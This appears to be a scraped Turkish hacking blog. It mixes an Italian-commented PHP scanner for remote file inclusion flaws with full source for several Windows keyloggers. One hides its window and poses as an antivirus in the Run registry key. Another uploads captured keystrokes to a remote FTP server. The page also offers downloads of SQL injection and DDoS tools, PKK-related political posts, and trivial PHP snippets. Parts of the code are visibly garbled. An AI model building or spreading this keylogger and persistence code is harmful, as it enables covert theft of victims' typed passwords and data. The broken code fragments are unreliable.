* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
* *
***************************************************************************/

/* regex per individuare le inclusioni */
$escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' )
;
/* regex per estrarre il nome delle variabili */
$escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' )
;
/* array di estensioni dei file da scansionare */
$escan_valid_ext = array( 'php' );
/* massima grandezza di un file da scansionare, se 0 scansiona tutti */
$escan_max_size = 0;
/* contatore delle directory scansionate */
$escan_dir_count = 0;
/* contatore dei file scansionati */
$escan_file_count = 0;
/* contatore dei potenziali rfi trovati */
$escan_match_count = 0;
/* contatore dei bytes totali scansionati */
$escan_byte_count = 0;

escan_banner();


if( $argc < 2 ){
escan_usage($argv[0]);
}
else{

$stime = escan_get_mtime();

escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );

$etime = escan_get_mtime();

print "\n@ Scan report : \n\n" .
"\t$escan_dir_count directory .\n".
"\t$escan_file_count file .\n".
"\t" . escan_format_size($escan_byte_count) . " .\n".
"\t$escan_match_count potenziali RFI .\n".
"\t".($etime-$stime) . " secondi di elaborazione .\n\n";
}

/* formatta in una stringa una grandezza espressa in bytes */
function escan_format_size($bytes)
{
if( $bytes < 1024 ) return "$bytes bytes";
if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb";
if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";

return ($bytes / 1073741824) . " Gb";
}

/* restituisce il timestamp espresso in secondi */
function escan_get_mtime()
{
list($usec, $sec) = explode(" ",microtime());
return ((float)$usec + (float)$sec);
}

/* estrae la linea di codice dell inclusione */
function escan_scan_line($content,$offset)
{
list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($c
ontent)) );

return $line.";";
}

/* estrae il nome della variabile dalla riga di codice dell inclusione */
function escan_parse_var( $line, $regex_id )
{
global $escan_var_regex;

$vars = preg_split($escan_var_regex[$regex_id],$line);
$varname = $vars[1];
$delimiters = " .);";

for( $i = 0; $i < strlen($varname); $i++ ){
for( $j = 0; $j < strlen($delimiters); $j++ ){
if($varname[$i] == $delimiters[$j]){
return substr( $varname, 0, $i );
}
}
}

return $varname;
}

/* controlla se la variabile $var viene definita in $content prima della posizio
ne $offset */
function escan_check_definitions($content,$offset,$var)
{
if( strpos( $var, "->" ) ){
return 1;
}

$chunk = substr($content,0,$offset);
$regex = "/".preg_quote($var,"/")."\s*=/ix";
preg_match( $regex, $chunk,$matches );

return count($matches);
}

/* parserizza il file $file per controllare la presenza di potenziali rfi */
function escan_parse_file($file)
{
global $escan_inc_regex;
global $escan_max_size;
global $escan_file_count;
global $escan_match_count;
global $escan_byte_count;

$fsize = filesize($file);

if( $escan_max_size && $fsize > $escan_max_size ) return;

$escan_file_count++;
$escan_byte_count += $fsize;

$content = @file_get_contents($file);

for( $i = 0; $i < count($escan_inc_regex); $i++ ){
if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PR
EG_OFFSET_CAPTURE ) ){

$nmatch = count($matches[0]);

for( $j = 0; $j < $nmatch; $j++ ){
$offset = $matches[0][$j][1];
$line = escan_scan_line($content,$offset);
$var = escan_parse_var($line,$i);

if( escan_check_definitions($content,$offset,$var) == 0 )
{
$escan_match_count++;
print "@ $file - \n\t- '$var' alla posizione $offset .\n"{ ;
}
}
}
}
}
}

/* restituisce l'estensione del file $fname */
function escan_get_file_ext($fname)
{
if( strchr($fname,'.') ){
return substr($fname,strrpos($fname,'.')+1);
}
else{
return "";
}
}

/* controlla se il file $fname è di un estensione valida */
function escan_isvalid_ext($fname)
{
global $escan_valid_ext;

for( $i = 0; $i < count($escan_valid_ext); $i++ ){
if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){
return true;
}
}

return false;
}

/* funzione che scansiona ricorsivamente le directory */
function escan_recurse_dir($dir)
{
global $escan_dir_count;

$escan_dir_count++;

if( $cdir = @dir($dir) ){
while( $entry = $cdir->read() ){
if( $entry != '.' && $entry != '..' ){
if( is_dir($dir.$entry) ){
escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
}
else{
if( escan_isvalid_ext($dir.$entry) ){
escan_parse_file($dir.$entry);
}
}
}
}

$cdir->close();
}
}

function escan_banner()
{
print "*-----------------------------------------------*\n" .
"* PHP Evil RFI Scanner v1.2 by evilsocket *\n" .
"* *\n" .
"* http://www.evilsocket.net *\n" .
"*-----------------------------------------------*\n\n";
}

function escan_usage($pname)
{
print "Uso : php $pname

\n";
}
?>

C# Local Keylogger

#include
#include
#define KEY "Nod32Bak.exe"

int keylogging(void)
{
short lul;
while(1)
{
sleep(5);
for(lul=8;lul<=222;lul++)
{
if(GetAsyncKeyState(lul)==-32767)
{
FILE *fp;
fp = fopen("C:\\WINDOWS\\system\\KL-Logs.log","a+");
if(fp == NULL)
{
return 1;
}
if(fp != NULL)
{
if((lul >= 39) && (lul <= 64))
{
fputc(lul,fp);
fclose(fp);
break;
}
else if((lul > 64) && (lul < 91))
{
lul+=32;
fputc(lul,fp);
fclose(fp);
break;
}
else
{
switch(lul)
{
case VK_SPACE:
fputc(' ',fp);
fclose(fp);
break;
case VK_SHIFT:
fputs("[SHIFT]",fp);
printf("[SHIFT]");
fclose(fp);
break;
case VK_RETURN:
fputs("\n[ENTER]",fp);
fclose(fp);
break;
case VK_BACK:
fputs("[BACKSPACE]",fp);
fclose(fp);
break;
case VK_TAB:
fputs("[TAB]",fp);
fclose(fp);
break;
case VK_CONTROL:
fputs("[CTRL]",fp);
fclose(fp);
break;
case VK_DELETE:
fputs("[DEL]",fp);
fclose(fp);
break;
case VK_OEM_1:
fputs("[;:]",fp);
fclose(fp);
break;
case VK_OEM_2:
fputs("[/?]",fp);
fclose(fp);
break;
case VK_OEM_3:
fputs("[`~]",fp);
fclose(fp);
break;
case VK_OEM_4:
fputs("[ [{ ]",fp);
fclose(fp);
break;
case VK_OEM_5:
fputs("[\\|]",fp);
fclose(fp);
break;
case VK_OEM_6:
fputs("[ ]} ]",fp);
fclose(fp);
break;
case VK_OEM_7:
fputs("['\"]",fp);
fclose(fp);
break;
case VK_NUMPAD0:
fputc('0',fp);
fclose(fp);
break;
case VK_NUMPAD1:
fputc('1',fp);
fclose(fp);
break;
case VK_NUMPAD2:
fputc('2',fp);
fclose(fp);
break;
case VK_NUMPAD3:
fputc('3',fp);
fclose(fp);
break;
case VK_NUMPAD4:
fputc('4',fp);
fclose(fp);
break;
case VK_NUMPAD5:
fputc('5',fp);
fclose(fp);
break;
case VK_NUMPAD6:
fputc('6',fp);
fclose(fp);
break;
case VK_NUMPAD7:
fputc('7',fp);
fclose(fp);
break;
case VK_NUMPAD8:
fputc('8',fp);
fclose(fp);
break;
case VK_NUMPAD9:
fputc('9',fp);
fclose(fp);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",fp);
fclose(fp);
break;
default:
fclose(fp);
break;
}
}
}
}
}
}
}
int main(int argc, char **argv)
{
HKEY lolz;
CopyFile("Keylogger.exe", "c:\\windows\\system32\\Nod32Bak.exe", 0);

HWND own = FindWindow(0,argv[0]);
ShowWindow(own, SW_HIDE);

RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&lolz, 0);

RegSetValueExA(lolz,
"Nod32 Anti-Virus",
0,
REG_SZ,
KEY,
50);

RegCloseKey(lolz);

CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging,0,0,0);
system("pause");
}


Download : C# Local Keylogger

C++ Simple Keylogger (3)

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void Upload()
{
  // get the date and time for filename
  time_t t;
  struct tm *ts;
  t = time(NULL);
  ts = localtime(&t);
  char* filename = asctime(ts);
  // -----------------------------------

  /* establashing ftp connection to configured server and uploads the file
  don´t forget to change server, user and password! */
  HINTERNET hInternet;
  HINTERNET hFtpSession;
  hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
  hFtpSession = InternetConnect(hInternet,"ftp_server",INTERNET_DEFAULT_FTP_PORT, "username","password", INTERNET_SERVICE_FTP, 0,0 );
  FtpPutFile(hFtpSession, "C:\\RECYCLER\\0829-83829287-10293-102ISO.log", filename, FTP_TRANSFER_TYPE_BINARY, 0);

  InternetCloseHandle(hFtpSession);
  InternetCloseHandle(hInternet);
}



std::string GetKey(int Key)
{
std::string KeyString = "";
if (Key == 8)
KeyString = "[delete]";
else if (Key == 13)
KeyString = "\n";
else if (Key == 32)
KeyString = " ";
else if (Key == VK_PAUSE)
KeyString = "[PAUSE]";
else if (Key == VK_CAPITAL)
KeyString = "[CAPITAL]";
else if (Key == VK_SHIFT)
KeyString = "[SHIFT]";
else if (Key == VK_TAB)
KeyString = "[TABULATOR]";
else if (Key == VK_CONTROL)
KeyString = "[CTRL]";
else if (Key == VK_ESCAPE)
KeyString = "[ESCAPE]";
else if (Key == VK_END)
KeyString = "[END]";
else if (Key == VK_HOME)
KeyString = "[HOME]";
else if (Key == VK_LEFT)
KeyString = "[left]";
else if (Key == VK_RIGHT)
KeyString = "[right]";
else if (Key == VK_UP)
KeyString = "[UP]";
else if (Key == VK_DOWN)
KeyString = "[DOWN]";
else if (Key == VK_SNAPSHOT)
KeyString = "[SNAPSHOT]";
else if (Key == VK_NUMLOCK)
KeyString = "[NUMLOCK]";
else if (Key == 190 || Key == 110)
KeyString = ".";
else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < keystring =" Key;"> 64 && Key < 91) { if (GetKeyState(VK_CAPITAL)) KeyString = Key; else { Key = Key + 32; KeyString = Key; } } }  return KeyString; }  int main() {   HWND stealth;  AllocConsole();  stealth = FindWindowA("ConsoleWindowClass",NULL);  ShowWindow(stealth,0);  Upload();  std::string Filename = "C:\\RECYCLER\\0829-83829287-10293-102ISO.log";  std::string TempString = "";  std::fstream FStream;  FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);  TCHAR szPath[MAX_PATH];  GetModuleFileName(NULL, szPath, MAX_PATH);   /* Create a New HKEY. */ HKEY newValue;  /* Open Registry key. */  RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",  &newValue);  /* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the  current user only.  Now give a new value.  Syntax for RegSetValueEx() function is LONG WINAPI RegSetValueEx( __in HKEY hKey, __in_opt LPCTSTR lpValueName,  __reserved DWORD Reserved, __in DWORD dwType, __in_opt const BYTE* lpData, __in DWORD cbData );  More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */   RegSetValueEx(newValue, "tcp.exe", 0,  REG_SZ, (LPBYTE)szPath, sizeof(szPath));   /* Close the key. */ RegCloseKey(newValue);     while(true) {  Sleep(5);  for(int i = 8; i < 191; i++) { if(GetAsyncKeyState(i)&1 ==1) { TempString = GetKey (i);  FStream.write(TempString.c_str(), TempString.size()); FStream.close(); FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

}

}

}  

}




Download : C++ Simple Keylogger (3)

C++ Simple Keylogger (2)

#include
#include
#include
#include


std::string GetKey(int Key)
{
std::string KeyString = "";

if (Key == 8)
KeyString = "[delete]";
else if (Key == 13)
KeyString = "\n";
else if (Key == 32)
KeyString = " ";
else if (Key == VK_PAUSE)
KeyString = "[PAUSE]";
else if (Key == VK_CAPITAL)
KeyString = "[CAPITAL]";
else if (Key == VK_SHIFT)
KeyString = "[SHIFT]";
else if (Key == VK_TAB)
KeyString = "[TABULATOR]";
else if (Key == VK_CONTROL)
KeyString = "[CTRL]";
else if (Key == VK_ESCAPE)
KeyString = "[ESCAPE]";
else if (Key == VK_END)
KeyString = "[END]";
else if (Key == VK_HOME)
KeyString = "[HOME]";
else if (Key == VK_LEFT)
KeyString = "[left]";
else if (Key == VK_RIGHT)
KeyString = "[right]";
else if (Key == VK_UP)
KeyString = "[UP]";
else if (Key == VK_DOWN)
KeyString = "[DOWN]";
else if (Key == VK_SNAPSHOT)
KeyString = "[SNAPSHOT]";
else if (Key == VK_NUMLOCK)
KeyString = "[NUMLOCK]";
else if (Key == 190 || Key == 110)
KeyString = ".";
else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < keystring =" Key;"> 64 && Key < 91)
{
if (GetKeyState(VK_CAPITAL))
KeyString = Key;
else
{
Key = Key + 32;
KeyString = Key;
}
}
}

return KeyString;
}

int main()
{
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);
std::string Filename = "C:\\log.txt";
std::string TempString = "";
std::fstream FStream;
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
/* Grab filename of process/exe using GetModuleFileName() function. */
TCHAR szPath[MAX_PATH];


GetModuleFileName(NULL,
szPath,
MAX_PATH);


/* Create a New HKEY. */
HKEY newValue;

/* Open Registry key. */

RegOpenKey(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&newValue);

/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the

current user only.

Now give a new value.

Syntax for RegSetValueEx() function is
LONG WINAPI RegSetValueEx(
__in HKEY hKey,
__in_opt LPCTSTR lpValueName,

__reserved DWORD Reserved,
__in DWORD dwType,
__in_opt const BYTE* lpData,
__in DWORD cbData
);

More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */


RegSetValueEx(newValue,
"keylogger2.exe",
0,

REG_SZ,
(LPBYTE)szPath,
sizeof(szPath));


/* Close the key. */
RegCloseKey(newValue);
return 0;
}

while(true)
{

Sleep(5);

for(int i = 8; i < 191; i++)
{
if(GetAsyncKeyState(i)&1 ==1)
{
TempString = GetKey (i);

FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}


Download : C++ Simple Keylogger (2)

C++ Simple Keylogger (1)

#include
#include
#include
#include


std::string GetKey(int Key)
{
std::string KeyString = "";

if (Key == 8)
KeyString = "[delete]";
else if (Key == 13)
KeyString = "\n";
else if (Key == 32)
KeyString = " ";
else if (Key == VK_PAUSE)
KeyString = "[PAUSE]";
else if (Key == VK_CAPITAL)
KeyString = "[CAPITAL]";
else if (Key == VK_SHIFT)
KeyString = "[SHIFT]";
else if (Key == VK_TAB)
KeyString = "[TABULATOR]";
else if (Key == VK_CONTROL)
KeyString = "[CTRL]";
else if (Key == VK_ESCAPE)
KeyString = "[ESCAPE]";
else if (Key == VK_END)
KeyString = "[END]";
else if (Key == VK_HOME)
KeyString = "[HOME]";
else if (Key == VK_LEFT)
KeyString = "[left]";
else if (Key == VK_RIGHT)
KeyString = "[right]";
else if (Key == VK_UP)
KeyString = "[UP]";
else if (Key == VK_DOWN)
KeyString = "[DOWN]";
else if (Key == VK_SNAPSHOT)
KeyString = "[SNAPSHOT]";
else if (Key == VK_NUMLOCK)
KeyString = "[NUMLOCK]";
else if (Key == 190 || Key == 110)
KeyString = ".";
else if (Key >=96 && Key <= 105) KeyString = Key-48; else if (Key > 47 && Key < keystring =" Key;"> 64 && Key < 91)
{
if (GetKeyState(VK_CAPITAL))
KeyString = Key;
else
{
Key = Key + 32;
KeyString = Key;
}
}
}

return KeyString;
}

int main()
{
std::string Filename = "C:\\log.txt";
std::string TempString = "";
std::fstream FStream;
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

while(true)
{

Sleep(5);

for(int i = 8; i < 191; i++)
{
if(GetAsyncKeyState(i)&1 ==1)
{
TempString = GetKey (i);

FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}

Download : C++ Simple Keylogger (1)

PHP SQL İnject Tool

Download : PHP SQL İnject Tool

Thanx Darkc0de

Jet SQL İntection Tool

Video Download

Tool Download

Thanx Darkc0de

Dark-Dork Searcher

Dark-Dork Searcher By jonathan59


Download : Dark-Dork Searcher ZShare

Download : Dark-Dork Searcher Rapidshare

Thanx Darkc0de

30 DDos Tools

Download : 30 Ddos Tools

rar pass : canvas

PKK kuruluşunun 31.yıldönümü

PKK, Abdullah Öcalan ve bir grup arkadaşı tarafından, 27 Kasım 1978 tarihinde Diyarbakır'ın Lice İlçesi'ne bağlı Fis Köyü'nde kuruldu. Amaç Türkiye Cumhuriyeti'nin hakimiyeti altındaki geçmiştei Kürtlerin yaşadığı topraklarda Marksist-Leninist temellere dayalı Kürt devleti kurmaktı.

Bugün yani 27 Kasım 2008'de 31. Yıldönümü kutluyoruz.

Yeni Bir Strateji

Yeni bir stratejinin başlangıcı mı?


PKK, Abdullah Öcalan ve bir grup arkadaşı tarafından, 27 Kasım 1978 tarihinde Diyarbakır'ın Lice İlçesi'ne bağlı Fis Köyü'nde kuruldu. Amaç Türkiye Cumhuriyeti'nin hakimiyeti altındaki geçmiştei Kürtlerin yaşadığı topraklarda Marksist-Leninist temellere dayalı Kürt devleti kurmaktı.

Öcalan, 1979 yılında Suriye’ye geçti ve Şam yönetiminin himayesine girdi. Eylemlerini buradan sevk ve idare etti.

Bölgenin en güçlü ordusuna sahip Türkiye, Suriye’nin PKK ve Abdullah Öcalan’a verdiği doğrudan desteğe tam 19 yıl sessiz kaldı. Diplomatik görüşmelerle, gidip-gelen heyetlerle sorunun çözümüne çalışıldı, hiç bir netice alınmadı.

Bu 19 sene içinde PKK devamlı büyüdü. Ülke içinde silahlı gücünü, ülke dışında da siyasi örgütlenmesini geliştirdi. Hemen hemen dünyanın her yerinde temsilcilikler kurdu. Yayın organlarını, televizyonunu ve 1995 yılında ‘‘Sürgündeki Kürt Parlamentosu’’ nu oluşturdu. Büyüyüp yayıldıkça beynelmilel alandaki desteği de arttı.

Eylül 1998’de sahne birden bire değişti. İlk tepki, “Suriye'ye karşı sabrımız kalmadı. Türkiye beklediği karşlığı alamazsa, her türlü tedbiri almaya hak kazanacaktır’’ şeklinde Kara Kuvvetleri Komutanı’ndan geldi. Bunu diğer devlet büyüklerinin aynı mealdeki açıklamaları izledi.

Suriye mesajı almış, bu sefer “Öcalan Suriye’de değil. İsterseniz kendiniz gelin tetkik edin” şeklinde cevap vermemişti.



Ondan sorası malum. Başbakan’ın açıklaması, zafer işaretleri...

Bütün bu gelişmeler, “Öcalan’ın Suriye’den çıkarılması acaba yeni bir stratejinin, PKK’nın siyasallaştırılması ve legalize edilmesi hareketinin başlangıç noktası mı?” sualini akla getiriyor.

Ne olmuş, ne değişmişti?. Sabrımızın taşması, meşru-müdafa hakkımızın kullanılması için 19 yıl kan akması mı gerekliydi? Yoksa olayın ne kadar ciddi olduğunun yeni mi farkına varmıştık. Neden bu çıkışlar 10 sene, 15 sene önce veya büyük bir katliamdan sonra yapılmadı? Kuzey Irak’taki yeni yapılanma ile Öcalan olayı arasında bir münasebet var mı?


İşte bu sualler, yeni bir suali: “Öcalan’ın Suriye’den çıkarılması acaba yeni bir stratejinin, PKK’nın siyasallaştırılması ve legalize edilmesi hareketinin başlangıç noktası mı?” sualini akla getiriyor.

Çarpım Tablosu PHP

Yaz çiz karala...

Matematik dersi görmemiş veya çarpım tablosunu halen ezberleyemeyenlere bir kolaylık :D

Çarpım Tablosu...

php code ;

< ?
$i=1;
for ($i=1;$i<10;$i++){
$j=1;
for ($j=1;$j<10;$j++){
$t=$k[$j]=$i * $j;
echo "$i X $j=".$t;

if (!($j<9)){
echo "-------";
print "Toplam :". (array_sum($k))."";
echo "-------";

}
}
}
?>



tr0yan0.blogspot.com

Sayısal Loto Tahmin Üreteci PHP :p

Yaz çiz karala..

Sayısal Loto Tiryakilerine ve Ya Tutarsa Düşünceli Vatandaşlarımıza Sayısal Loto Tahmin Üreticisi..

İş Şansa Kaldıysa İş Yaş Baş Baş Diyorum XD



< ?
function isInside($r,$array,$k) {
for($j=0;$j<=$k;$j++) {
if($array[$j]==$r)
return 0;
}
return 1;
}

function rastgele() {
$r= rand(1, 49);
return $r;
}

$i=0;
$adet=array();
while ($i <7 ) {
$kontrol=0;
if($i!=0) {
while($kontrol == 0) {
$rastgele=rastgele();
$kontrol=isInside($rastgele,$adet,$i);
}
}else{
$rastgele=rastgele();
}
$adet[$i]=$rastgele;
$i++;
}

sort($adet);
foreach($adet AS $sira => $sayi) {
echo $sayi."-";
}
?>



tr0yan0.blogspot.com


PKK’nın Hacker’i bilgileri porno ve oyun siteleriyle ele geçirmiş

DİYARBAKIR’da hırsızlık şüphesiyle 9 Kasım'da yakalanan ve dizüstü bilgisayarında devlete ait gizli bilgiler bulunan R.C’nin, gizli bilgileri gönderdiği virüs programıyla elde ettiği ortaya çıktı. Ele geçirdiği bilgeleri PKK’nın elebaşlarından Murat Karayılan’a aktardığı belirlenen R.C’nin CD’leri içerisindeki dokümanlar arasında MİT mensuplarının bilgisayarlarındaki kişisel bilgiler de yer alıyor.
Diyarbakır’daki Bit Pazarı civarında polisin çalıntı hırsızlık malı satanlara yönelik yaptığı operasyon sırasında tesadüf sonucu şüphe üzerine durdurularak elindeki dizüstü bilgisayarın incelenmesi sonucu gözaltına alınıp tutuklanan 20 yaşındaki Hacker R.C’nin, kendi geliştirdiği bir virüs programı aracılığıyla bilgisayarlardaki kişisel verileri elde edip kendi bilgisayarına artardığı ortaya çıktı. R.C’nin MİT, Genelkurmay, emniyet ve jandarmaya ait elde ettiği verileri film ve müzik CD’leri içerisine gizleyip şifrelemesiyle ilgili yapılan incemelerde önemli bilgilere ulaşıldı. ‘Yasadışı PKK terör örgütü adına resmi kurumlara ait gizli ve özel belgeleri bulundurmak’ suçundan tutuklanan R.C’nin gönderdiği virüs programı sayesinde Şırnak 23’üncü Jandarma Sınır Tümen Komutanlığı ile Mekanize Piyade Tugay Komutanlıklarına ait bilgiler, personel sayısı ile kimliği saklı tutulan ve MİT’te çalışan bir kişinin bilgisayarından bilgiler elde ettiği tespit edildi.

PORNO VE OYUN SİTELERİ

PKK’nın Hackeri R.C’nin kendi geliştirdiği ve virüs koruma programlarının bile yakalayamadığı Poison İVY adlı virüsü, porno ve oyun sitelerine yerleştirdiği, bu siteleri ziyaret eden kişilerin bilgisayarlarını anında ele geçirip kullanıcı konumuna geçtiği belirlendi. Hackerin porno ve oyun sitelerini özellikle tercih etmesindeki asıl nedenin ise bu sitelerin en çok ziyaret edilen siteler olması nedeniyle seçtiği öğrenildi. Google üzerinden porno ve oyun sitelerine giriş yapan kullanıcıların bilgisayarlarını anında ele geçirip tam kullanıcı olarak bu yöntemle karşı taraftaki kişinin bilgisayarındaki tüm bilgileri kendi bilgisayarına aktardığı ifade edildi. Hackerin evinde ele geçen 22 harddisk, 2 disüstü bilgisayar, 1 kamera harddiski, 85 disket, 32 MB’lik hafıza kartı, 2 DVD’nin çözümüyle ilgili inceleme ise sürüyor.

4 KİŞİYİ FOTOĞRAFTAN TEŞHİS ETTİ

Bu arada Hackerin elde ettiği gizli bilgileri PKK'nın ele başlarından Murat Karayılan’a aktaran kişinin de kimliği belirlendi. Kendisiyle bağlantılı olan 4 kişiyi fotoğraflarından teşhis eden R.C’nin verdiği bilgiler doğrultusunda soruşturma genişletildi. Hacker’in elde ettiği bilgileri Murat Karayılan’a ulaştıran Diyarbakır’daki PKK kuryesinin ise gerçek kimliği soruşturmanın gizliliği nedeniyle saklı tutulan ‘Baver’ kod adlı kişi olduğu belirlendi.
Baver kod adlı PKK kuryesiyle R.C’yi tanıştıran diğer 3 kişinin ise R.C’nin liseden okul arkadaşı olan ve halen Fransa’da olduğu belirlenen U.Z.T ile H.T ve M.K oldukları fotoğraf teşhisinden belirlendi. Bu kişilerin de soruşturma kapsamında arandıkları bildirildi.